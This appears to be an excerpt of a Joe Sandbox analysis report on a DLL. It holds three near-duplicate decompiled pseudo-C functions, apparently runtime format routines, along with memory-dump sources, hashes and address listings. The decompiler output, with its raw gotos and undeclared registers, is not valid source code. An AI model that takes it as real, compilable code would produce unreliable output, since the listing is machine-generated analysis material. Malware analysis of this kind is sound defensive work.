                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 245bd1deb71e1c5b9f288b4803590cea0609b6ca0e8f78be2f2fea896bcdb82f
                                                                      • Instruction ID: bda8817688db72ba142e0655b28d4d902425cd5f6d98691470120a052182cc0c
                                                                      • Opcode Fuzzy Hash: 245bd1deb71e1c5b9f288b4803590cea0609b6ca0e8f78be2f2fea896bcdb82f
                                                                      • Instruction Fuzzy Hash: BB516072114EC886F7A78F28C4543ED27A0E75EBDCF158216FA4A0B799CF25CA4AC744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001CD00(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t162;
                                                                      
                                                                      				_t159 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001cddf;
                                                                      				if (_t109 == 0) goto 0x8001cd59;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001ce33;
                                                                      				if (_t110 == 0) goto 0x8001cdaf;
                                                                      				if (_t110 == 0) goto 0x8001cd80;
                                                                      				if (_t110 == 0) goto 0x8001ce33;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001cdff;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ce5c;
                                                                      				E000000011800197B8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ce61;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cda5;
                                                                      				_t70 = E00000001180017158( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ce61;
                                                                      				E00000001180017800(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001ce61;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001cdd5;
                                                                      				_t74 = E00000001180016870( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001ce61;
                                                                      				E00000001180016CE8(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001ce61;
                                                                      				if (_t114 == 0) goto 0x8001cd59;
                                                                      				if (_t114 == 0) goto 0x8001cd59;
                                                                      				if (_t114 == 0) goto 0x8001cd59;
                                                                      				goto 0x8001cd47;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001cf11;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001ce55;
                                                                      				_t80 = E00000001180017C70( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001ce61;
                                                                      				_t81 = E000000011800180E0(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001ce61;
                                                                      				E00000001180019C28(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001ce2c;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001ce7b;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001cf0f;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001ce99;
                                                                      				if (_t152 >= 0) goto 0x8001ce99;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001cea8;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001cebf;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001671C(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001cec8;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x8001cee1;
                                                                      				E00000001180021764(_t131, _t153);
                                                                      				goto 0x8001cee8;
                                                                      				E000000011800201E8(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001cf0f;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001cf01;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001cf0f;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001cd00
                                                                      0x18001cd00
                                                                      0x18001cd05
                                                                      0x18001cd0a
                                                                      0x18001cd1b
                                                                      0x18001cd1e
                                                                      0x18001cd21
                                                                      0x18001cd24
                                                                      0x18001cd2a
                                                                      0x18001cd2d
                                                                      0x18001cd33
                                                                      0x18001cd35
                                                                      0x18001cd37
                                                                      0x18001cd40
                                                                      0x18001cd45
                                                                      0x18001cd4a
                                                                      0x18001cd53
                                                                      0x18001cd60
                                                                      0x18001cd70
                                                                      0x18001cd76
                                                                      0x18001cd7b
                                                                      0x18001cd87
                                                                      0x18001cd99
                                                                      0x18001cd9b
                                                                      0x18001cda0
                                                                      0x18001cda5
                                                                      0x18001cdaa
                                                                      0x18001cdb6
                                                                      0x18001cdc6
                                                                      0x18001cdc9
                                                                      0x18001cdcb
                                                                      0x18001cdd0
                                                                      0x18001cdd5
                                                                      0x18001cdda
                                                                      0x18001cde2
                                                                      0x18001cdeb
                                                                      0x18001cdf4
                                                                      0x18001cdfa
                                                                      0x18001cdff
                                                                      0x18001ce03
                                                                      0x18001ce06
                                                                      0x18001ce0d
                                                                      0x18001ce11
                                                                      0x18001ce1c
                                                                      0x18001ce21
                                                                      0x18001ce27
                                                                      0x18001ce2e
                                                                      0x18001ce3a
                                                                      0x18001ce4c
                                                                      0x18001ce4e
                                                                      0x18001ce53
                                                                      0x18001ce55
                                                                      0x18001ce5a
                                                                      0x18001ce5c
                                                                      0x18001ce63
                                                                      0x18001ce6c
                                                                      0x18001ce75
                                                                      0x18001ce80
                                                                      0x18001ce89
                                                                      0x18001ce8e
                                                                      0x18001ce90
                                                                      0x18001ce93
                                                                      0x18001ce96
                                                                      0x18001ce9d
                                                                      0x18001ce9f
                                                                      0x18001cea6
                                                                      0x18001ceb3
                                                                      0x18001ceba
                                                                      0x18001cec2
                                                                      0x18001cec4
                                                                      0x18001cec8
                                                                      0x18001cecc
                                                                      0x18001ced5
                                                                      0x18001ceda
                                                                      0x18001cedf
                                                                      0x18001cee3
                                                                      0x18001cef0
                                                                      0x18001cef6
                                                                      0x18001ceff
                                                                      0x18001cf01
                                                                      0x18001cf09
                                                                      0x18001cf0c
                                                                      0x18001cf29

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6e95f257303535e1e4dbded6f5529ef6c53255517f1a0e7cd0fd1684dc960b6
                                                                      • Instruction ID: 55c5b7ba88b8dc09b852bd3de6e72cf6ce554bfc89fd2cbc4cbbab0dc1af6b17
                                                                      • Opcode Fuzzy Hash: e6e95f257303535e1e4dbded6f5529ef6c53255517f1a0e7cd0fd1684dc960b6
                                                                      • Instruction Fuzzy Hash: 9B516572114A8886F7A79E28C0147EC27A1E74DBDCF158215FA4907699CF35CA4AC74A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001D2FC(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t162;
                                                                      
                                                                      				_t159 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001d3db;
                                                                      				if (_t109 == 0) goto 0x8001d355;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001d42f;
                                                                      				if (_t110 == 0) goto 0x8001d3ab;
                                                                      				if (_t110 == 0) goto 0x8001d37c;
                                                                      				if (_t110 == 0) goto 0x8001d42f;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001d3fb;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d458;
                                                                      				E000000011800198C0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001d45d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d3a1;
                                                                      				_t70 = E00000001180017260( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001d45d;
                                                                      				E00000001180017908(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001d45d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001d3d1;
                                                                      				_t74 = E00000001180016978( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001d45d;
                                                                      				E00000001180016DF0(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001d45d;
                                                                      				if (_t114 == 0) goto 0x8001d355;
                                                                      				if (_t114 == 0) goto 0x8001d355;
                                                                      				if (_t114 == 0) goto 0x8001d355;
                                                                      				goto 0x8001d343;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001d50d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001d451;
                                                                      				_t80 = E00000001180017D78( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001d45d;
                                                                      				_t81 = E000000011800181E4(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001d45d;
                                                                      				E00000001180019D30(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001d428;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001d477;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001d50b;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001d495;
                                                                      				if (_t152 >= 0) goto 0x8001d495;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001d4a4;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001d4bb;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				E0000000118001671C(_t131, _t131 + 0x50,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001d4c4;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x8001d4dd;
                                                                      				E00000001180021968(_t131, _t153);
                                                                      				goto 0x8001d4e4;
                                                                      				E000000011800203E0(__esi, _t131, _t153);
                                                                      				if (0 == 0) goto 0x8001d50b;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001d4fd;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001d50b;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001d2fc
                                                                      0x18001d2fc
                                                                      0x18001d301
                                                                      0x18001d306
                                                                      0x18001d317
                                                                      0x18001d31a
                                                                      0x18001d31d
                                                                      0x18001d320
                                                                      0x18001d326
                                                                      0x18001d329
                                                                      0x18001d32f
                                                                      0x18001d331
                                                                      0x18001d333
                                                                      0x18001d33c
                                                                      0x18001d341
                                                                      0x18001d346
                                                                      0x18001d34f
                                                                      0x18001d35c
                                                                      0x18001d36c
                                                                      0x18001d372
                                                                      0x18001d377
                                                                      0x18001d383
                                                                      0x18001d395
                                                                      0x18001d397
                                                                      0x18001d39c
                                                                      0x18001d3a1
                                                                      0x18001d3a6
                                                                      0x18001d3b2
                                                                      0x18001d3c2
                                                                      0x18001d3c5
                                                                      0x18001d3c7
                                                                      0x18001d3cc
                                                                      0x18001d3d1
                                                                      0x18001d3d6
                                                                      0x18001d3de
                                                                      0x18001d3e7
                                                                      0x18001d3f0
                                                                      0x18001d3f6
                                                                      0x18001d3fb
                                                                      0x18001d3ff
                                                                      0x18001d402
                                                                      0x18001d409
                                                                      0x18001d40d
                                                                      0x18001d418
                                                                      0x18001d41d
                                                                      0x18001d423
                                                                      0x18001d42a
                                                                      0x18001d436
                                                                      0x18001d448
                                                                      0x18001d44a
                                                                      0x18001d44f
                                                                      0x18001d451
                                                                      0x18001d456
                                                                      0x18001d458
                                                                      0x18001d45f
                                                                      0x18001d468
                                                                      0x18001d471
                                                                      0x18001d47c
                                                                      0x18001d485
                                                                      0x18001d48a
                                                                      0x18001d48c
                                                                      0x18001d48f
                                                                      0x18001d492
                                                                      0x18001d499
                                                                      0x18001d49b
                                                                      0x18001d4a2
                                                                      0x18001d4af
                                                                      0x18001d4b6
                                                                      0x18001d4be
                                                                      0x18001d4c0
                                                                      0x18001d4c4
                                                                      0x18001d4c8
                                                                      0x18001d4d1
                                                                      0x18001d4d6
                                                                      0x18001d4db
                                                                      0x18001d4df
                                                                      0x18001d4ec
                                                                      0x18001d4f2
                                                                      0x18001d4fb
                                                                      0x18001d4fd
                                                                      0x18001d505
                                                                      0x18001d508
                                                                      0x18001d525

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e4403f0d54fb1019709c5a48cacd662f12ea5cf3f87840b820aa961d4794a5ce
                                                                      • Instruction ID: 6ca416688b0883489396a2e7091885156c617ffc9be08e08ba496a9164b2d5ab
                                                                      • Opcode Fuzzy Hash: e4403f0d54fb1019709c5a48cacd662f12ea5cf3f87840b820aa961d4794a5ce
                                                                      • Instruction Fuzzy Hash: F1518E72114E4C87FBAB8E29D0543EC27A0E74DBDCF148216FA4A0A699CF35DA4AC701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001B4F8(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t91;
                                                                      				signed int _t100;
                                                                      				void* _t109;
                                                                      				intOrPtr _t110;
                                                                      				signed int _t114;
                                                                      				intOrPtr _t128;
                                                                      				void* _t131;
                                                                      				signed long long _t152;
                                                                      				signed long long _t153;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				void* _t162;
                                                                      
                                                                      				_t159 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t131 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t91 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t109 = _t91 - 5;
                                                                      				if (_t109 > 0) goto 0x8001b5d7;
                                                                      				if (_t109 == 0) goto 0x8001b551;
                                                                      				_t110 = _t91;
                                                                      				if (_t110 == 0) goto 0x8001b62b;
                                                                      				if (_t110 == 0) goto 0x8001b5a7;
                                                                      				if (_t110 == 0) goto 0x8001b578;
                                                                      				if (_t110 == 0) goto 0x8001b62b;
                                                                      				if (_t91 - 0xffffffffffffffff != 1) goto 0x8001b5f7;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b654;
                                                                      				E000000011800197B8( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001b659;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b59d;
                                                                      				_t70 = E00000001180017158( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001b659;
                                                                      				E00000001180017800(_t70, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001b659;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t114 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t114 == 0) goto 0x8001b5cd;
                                                                      				_t74 = E00000001180016870( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001b659;
                                                                      				E00000001180016CE8(_t74, __rcx, __rcx,  &_a8, _t159);
                                                                      				goto 0x8001b659;
                                                                      				if (_t114 == 0) goto 0x8001b551;
                                                                      				if (_t114 == 0) goto 0x8001b551;
                                                                      				if (_t114 == 0) goto 0x8001b551;
                                                                      				goto 0x8001b53f;
                                                                      				_t128 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t128 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t128 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t156, _t159);
                                                                      				goto 0x8001b709;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001b64d;
                                                                      				_t80 = E00000001180017C70( *(_t131 + 0x28) >> 4, _t131, _t131,  &_a8);
                                                                      				goto 0x8001b659;
                                                                      				_t81 = E000000011800180E0(_t80, _t131, _t131,  &_a8, _t159);
                                                                      				goto 0x8001b659;
                                                                      				E00000001180019C28(_t81, _t131, _t131,  &_a8);
                                                                      				if (0 == 0) goto 0x8001b624;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x470)) != 1) goto 0x8001b673;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x474)) != 1) goto 0x8001b707;
                                                                      				_t152 = _a8;
                                                                      				if (0 == 0) goto 0x8001b691;
                                                                      				if (_t152 >= 0) goto 0x8001b691;
                                                                      				_t153 =  ~_t152;
                                                                      				_t100 =  *(_t131 + 0x28) | 0x00000040;
                                                                      				 *(_t131 + 0x28) = _t100;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x30)) >= 0) goto 0x8001b6a0;
                                                                      				 *((intOrPtr*)(_t131 + 0x30)) = 1;
                                                                      				goto 0x8001b6b7;
                                                                      				 *(_t131 + 0x28) = _t100 & 0xfffffff7;
                                                                      				_t48 = _t131 + 0x50; // 0x91
                                                                      				E0000000118001671C(_t131, _t48,  *((intOrPtr*)(_t131 + 0x30)), _t153,  *((intOrPtr*)(_t131 + 8)));
                                                                      				if (_t153 != 0) goto 0x8001b6c0;
                                                                      				 *(_t131 + 0x28) =  *(_t131 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t131 + 0x4c)) = 0;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x8001b6d9;
                                                                      				E0000000118002111C(0, _t131, _t153);
                                                                      				goto 0x8001b6e0;
                                                                      				E0000000118001FBA4(__esi, _t131);
                                                                      				if (0 == 0) goto 0x8001b707;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x48)) == 0) goto 0x8001b6f9;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t131 + 0x40)))) == 0x30) goto 0x8001b707;
                                                                      				 *((long long*)(_t131 + 0x40)) =  *((long long*)(_t131 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t131 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t131 + 0x48)) =  *((intOrPtr*)(_t131 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001b4f8
                                                                      0x18001b4f8
                                                                      0x18001b4fd
                                                                      0x18001b502
                                                                      0x18001b513
                                                                      0x18001b516
                                                                      0x18001b519
                                                                      0x18001b51c
                                                                      0x18001b522
                                                                      0x18001b525
                                                                      0x18001b52b
                                                                      0x18001b52d
                                                                      0x18001b52f
                                                                      0x18001b538
                                                                      0x18001b53d
                                                                      0x18001b542
                                                                      0x18001b54b
                                                                      0x18001b558
                                                                      0x18001b568
                                                                      0x18001b56e
                                                                      0x18001b573
                                                                      0x18001b57f
                                                                      0x18001b591
                                                                      0x18001b593
                                                                      0x18001b598
                                                                      0x18001b59d
                                                                      0x18001b5a2
                                                                      0x18001b5ae
                                                                      0x18001b5be
                                                                      0x18001b5c1
                                                                      0x18001b5c3
                                                                      0x18001b5c8
                                                                      0x18001b5cd
                                                                      0x18001b5d2
                                                                      0x18001b5da
                                                                      0x18001b5e3
                                                                      0x18001b5ec
                                                                      0x18001b5f2
                                                                      0x18001b5f7
                                                                      0x18001b5fb
                                                                      0x18001b5fe
                                                                      0x18001b605
                                                                      0x18001b609
                                                                      0x18001b614
                                                                      0x18001b619
                                                                      0x18001b61f
                                                                      0x18001b626
                                                                      0x18001b632
                                                                      0x18001b644
                                                                      0x18001b646
                                                                      0x18001b64b
                                                                      0x18001b64d
                                                                      0x18001b652
                                                                      0x18001b654
                                                                      0x18001b65b
                                                                      0x18001b664
                                                                      0x18001b66d
                                                                      0x18001b678
                                                                      0x18001b681
                                                                      0x18001b686
                                                                      0x18001b688
                                                                      0x18001b68b
                                                                      0x18001b68e
                                                                      0x18001b695
                                                                      0x18001b697
                                                                      0x18001b69e
                                                                      0x18001b6ab
                                                                      0x18001b6ae
                                                                      0x18001b6b2
                                                                      0x18001b6ba
                                                                      0x18001b6bc
                                                                      0x18001b6c0
                                                                      0x18001b6c4
                                                                      0x18001b6cd
                                                                      0x18001b6d2
                                                                      0x18001b6d7
                                                                      0x18001b6db
                                                                      0x18001b6e8
                                                                      0x18001b6ee
                                                                      0x18001b6f7
                                                                      0x18001b6f9
                                                                      0x18001b701
                                                                      0x18001b704
                                                                      0x18001b721

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d2edb1abf130f856b4ff46facd1f170f8fb3f255e21a1a76e62fb97658c70cb2
                                                                      • Instruction ID: c74f8609eb3864b27ac62a793dc65666fb7d7e18c5fa16907c6366d79edf8444
                                                                      • Opcode Fuzzy Hash: d2edb1abf130f856b4ff46facd1f170f8fb3f255e21a1a76e62fb97658c70cb2
                                                                      • Instruction Fuzzy Hash: 1351B132110E4886FBB79F29C0143EC27A5E75DBDCF188215FA498A7D9CF29CA49C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
